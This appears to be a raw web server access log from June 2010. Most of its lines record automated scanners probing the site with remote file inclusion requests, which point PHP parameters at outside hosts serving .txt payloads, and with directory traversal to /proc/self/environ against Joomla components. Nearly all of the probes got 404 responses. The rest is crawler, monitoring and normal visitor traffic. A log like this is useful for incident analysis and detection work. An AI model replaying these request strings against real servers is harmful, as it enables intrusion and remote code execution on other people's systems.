149.31.6.24 - - [23/Jun/2010:00:39:35 -0400] "GET /logs/access_log.Q109100900%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
202.160.123.72 - - [23/Jun/2010:00:40:01 -0400] "GET /logs/access_log.Q109061100//xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
88.251.248.140 - - [23/Jun/2010:00:40:08 -0400] "GET /administrator/index.php HTTP/1.1" 404 221 "-" "-"
201.36.173.93 - - [23/Jun/2010:00:40:28 -0400] "GET /logs/error_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
109.71.41.45 - - [23/Jun/2010:00:40:31 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
149.31.6.24 - - [23/Jun/2010:00:40:44 -0400] "GET /logs/error_log.Q109092700%20%20//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:40:44 -0400] "GET /logs/access_log.Q109053100%20%20//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
95.156.233.139 - - [23/Jun/2010:00:41:10 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:41:10 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:41:10 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:41:12 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:41:12 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:41:12 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
67.195.114.223 - - [23/Jun/2010:00:41:07 -0400] "GET /logs/error_log.Q109061400 HTTP/1.0" 200 2680727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.245.251 - - [23/Jun/2010:00:40:55 -0400] "GET /logs/access_log.Q109120300 HTTP/1.1" 200 5973546 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.156.233.139 - - [23/Jun/2010:00:42:01 -0400] "GET /logs/access_log.Q110052700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:42:01 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:42:01 -0400] "GET /logs/access_log.Q110061100//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
95.156.233.139 - - [23/Jun/2010:00:42:02 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:42:02 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:42:02 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
95.156.233.139 - - [23/Jun/2010:00:42:08 -0400] "GET /logs/access_log.Q110061100//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:42:09 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:42:09 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:42:09 -0400] "GET /logs/access_log.Q110052700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:42:09 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:42:10 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
95.156.233.139 - - [23/Jun/2010:00:42:20 -0400] "GET /logs/error_log.Q110052700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:42:29 -0400] "GET /logs/error_log.Q110052700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
202.160.123.72 - - [23/Jun/2010:00:42:42 -0400] "GET /logs/error_log.Q109090800///xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
202.160.123.72 - - [23/Jun/2010:00:42:43 -0400] "GET ///xmlrpc.php HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
202.160.123.72 - - [23/Jun/2010:00:42:44 -0400] "GET /logs///xmlrpc.php HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
95.156.233.139 - - [23/Jun/2010:00:42:46 -0400] "GET /logs/error_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:42:55 -0400] "GET /logs/error_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
66.249.71.206 - - [23/Jun/2010:00:43:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LD26BD566847090005348022+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
149.31.6.24 - - [23/Jun/2010:00:44:36 -0400] "GET /logs/error_log.Q110061000//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
109.71.41.45 - - [23/Jun/2010:00:44:40 -0400] "GET /logs/access_log.Q110061200//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
95.156.233.139 - - [23/Jun/2010:00:44:44 -0400] "GET /logs/access_log.Q110061200//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
67.195.114.223 - - [23/Jun/2010:00:44:32 -0400] "GET /logs/access_log.Q110033100 HTTP/1.0" 200 6087930 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [23/Jun/2010:00:45:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.54.22.2 - - [23/Jun/2010:00:49:17 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
149.31.6.24 - - [23/Jun/2010:00:49:23 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:49:23 -0400] "GET /logs/error_log.Q109120300//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:49:23 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
95.108.245.251 - - [23/Jun/2010:00:49:40 -0400] "GET /logs/access_log.Q109101600 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
216.120.252.192 - - [23/Jun/2010:00:49:47 -0400] "GET /ndex.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.831"
67.159.44.97 - - [23/Jun/2010:00:49:49 -0400] "GET //admin/admin_admin.php?root_folder_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:49:49 -0400] "GET /logs//admin/admin_admin.php?root_folder_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:49:49 -0400] "GET /logs/access_log.Q109052100%20%20//admin/admin_admin.php?root_folder_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:00:49:56 -0400] "GET /logs/error_log.Q110061200//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:00:49:56 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:00:49:56 -0400] "GET /logs//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.120.252.192 - - [23/Jun/2010:00:50:46 -0400] "GET /ndex.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.831"
216.120.252.192 - - [23/Jun/2010:00:50:57 -0400] "GET /ndex.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.831"
74.54.22.2 - - [23/Jun/2010:00:51:03 -0400] "GET /logs/access_log.Q110061200//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.120.252.192 - - [23/Jun/2010:00:52:11 -0400] "GET /logs/access_log.Q110060700/ndex.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
216.120.252.192 - - [23/Jun/2010:00:52:11 -0400] "GET /ndex.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.831"
216.120.252.192 - - [23/Jun/2010:00:52:11 -0400] "GET /logs/ndex.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.831"
216.120.252.192 - - [23/Jun/2010:00:52:11 -0400] "GET /logs/error_log.Q110060500/ndex.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.831"
149.31.6.24 - - [23/Jun/2010:00:52:46 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:52:46 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:52:46 -0400] "GET /logs/error_log.Q109120300%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Jun/2010:00:53:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
149.31.6.24 - - [23/Jun/2010:00:53:23 -0400] "GET /logs/error_log.Q110061000//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.71.73 - - [23/Jun/2010:00:53:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0178D7563DD19900E15B051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.160.123.72 - - [23/Jun/2010:00:54:04 -0400] "GET /logs/error_log.Q110020100///xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
81.80.122.44 - - [23/Jun/2010:00:54:17 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
81.80.122.44 - - [23/Jun/2010:00:54:17 -0400] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
67.159.44.97 - - [23/Jun/2010:00:54:17 -0400] "GET /logs/access_log.Q110052200//admin/admin_admin.php?root_folder_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
81.80.122.44 - - [23/Jun/2010:00:54:18 -0400] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
149.31.6.24 - - [23/Jun/2010:00:54:25 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:54:33 -0400] "GET /logs/error_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:00:54:44 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.828"
149.31.6.24 - - [23/Jun/2010:00:54:52 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.121.240.147 - - [23/Jun/2010:00:55:06 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
178.63.27.83 - - [23/Jun/2010:00:55:15 -0400] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
74.54.22.2 - - [23/Jun/2010:00:55:30 -0400] "GET /logs/access_log.Q110061200//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:00:55:30 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:00:55:30 -0400] "GET /logs//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
200.175.239.226 - - [23/Jun/2010:00:55:38 -0400] "GET /?pag=http://www.cricermenate.it/idd.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
200.175.239.226 - - [23/Jun/2010:00:55:45 -0400] "GET /?pag=http://www.cricermenate.it/idd.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
200.175.239.226 - - [23/Jun/2010:00:55:46 -0400] "GET /?pag=http://www.cricermenate.it/idd.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
81.80.122.44 - - [23/Jun/2010:00:55:48 -0400] "GET /logs/access_log.Q110060500/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:00:56:24 -0400] "GET /logs/error_log.Q110060600//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
149.31.6.24 - - [23/Jun/2010:00:56:26 -0400] "GET /logs/error_log.Q109120300%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:56:52 -0400] "GET /logs/access_log.Q109123000//login.php?foing_root_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.108.245.251 - - [23/Jun/2010:00:57:31 -0400] "GET /logs/error_log.Q109072800 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
149.31.6.24 - - [23/Jun/2010:00:57:38 -0400] "GET /logs/error_log.Q109120300//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:00:57:47 -0400] "GET /logs/access_log.Q110060600//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
149.31.6.24 - - [23/Jun/2010:00:58:04 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.80.122.44 - - [23/Jun/2010:00:59:50 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
81.80.122.44 - - [23/Jun/2010:00:59:51 -0400] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
81.80.122.44 - - [23/Jun/2010:00:59:51 -0400] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
178.63.27.83 - - [23/Jun/2010:01:00:04 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
178.63.27.83 - - [23/Jun/2010:01:00:04 -0400] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
174.121.176.85 - - [23/Jun/2010:05:15:16 -0400] "GET /logs/access_log.Q110011100%20%20/error.php?dir=http://www.roger-riedi.ch/fw6/language/pdf_fonts/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.223.63.220 - - [23/Jun/2010:05:16:08 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.223.63.220 - - [23/Jun/2010:05:16:08 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
64.22.67.37 - - [23/Jun/2010:05:16:13 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
64.22.67.37 - - [23/Jun/2010:05:16:14 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
64.22.67.37 - - [23/Jun/2010:05:16:43 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
64.22.67.37 - - [23/Jun/2010:05:16:43 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
121.169.189.169 - - [23/Jun/2010:05:15:16 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 77252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:16:32 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 77252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:09 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:09 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:09 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:09 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:09 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:09 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
